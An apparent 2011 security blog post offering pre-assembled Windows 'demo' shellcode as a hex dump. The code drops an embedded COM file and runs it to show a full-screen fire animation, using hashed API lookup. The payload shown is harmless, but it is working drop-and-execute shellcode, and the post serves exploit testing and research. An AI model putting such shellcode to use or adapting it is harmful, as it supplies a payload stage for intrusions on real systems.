Fire.com Demo shellcode
Submitted by dz on Fri, 04/01/2011 - 10:40
Tagged:
Drop and execute an embedded com file which displays a fire animation taking over the entire screen.
This shellcode uses the API lookup template by Stephen Fewer http://blog.harmonysecurity.com/2009/08/calling-api-functions.html
couple more demo shellcodes here:
http://sandsprite.com/blogs/index.php?uid=7&pid=153
Pre-assembled: (no encoder)
FCE8890000006089E531D2648B52308B520C8B52148B72280FB74A2631FF3
1C0AC3C617C022C20C1CF0D01C7E2F052578B52108B423C01D08B407885C0
744A01D0508B48188B582001D3E33C498B348B01D631FF31C0ACC1CF0D01C
738E075F4037DF83B7D2475E2588B582401D3668B0C4B8B581C01D38B048B
01D0894424245B5B61595A51FFE0585F5A8B12EB865D8D85BB0100005068F
F0000006830F349E4FFD58D9DBB01000001D8682E636F6D8F006A008D85BB
01000050682C5B06E2FFD589C668AC0000008D9D0F010000535068F65F8EE
9FFD589F05068ACFF8DF5FFD56A018D85BB0100005068318B6F87FFD568D0
0700006844F035E0FFD58D9DBB0100005368D72EDD13FFD56A0068F0B5A25
6FFD5B013CD1033C0BFB001B9007DF3ABBAC803EE42FEC980FB3C730580C3
04EB0880FF3C730380C7048AC3EE8AC7EE32C0EEE2E3B1C88106AC01E9628
006AC01628116AE011936A1AE0133D2BB4001F7F38BF2FE8C707DE2DDBEF1
02BFB17EB162BA3E018A9CC0FE8A44FF03D88A440103D88A84400103D8C1E
B02881D46474A75E246464747E2D9BEB27EBFB201B97E3E5157F3A55E6800
A007BF027D59F3A51E07B401CD16748CB80300CD10C3

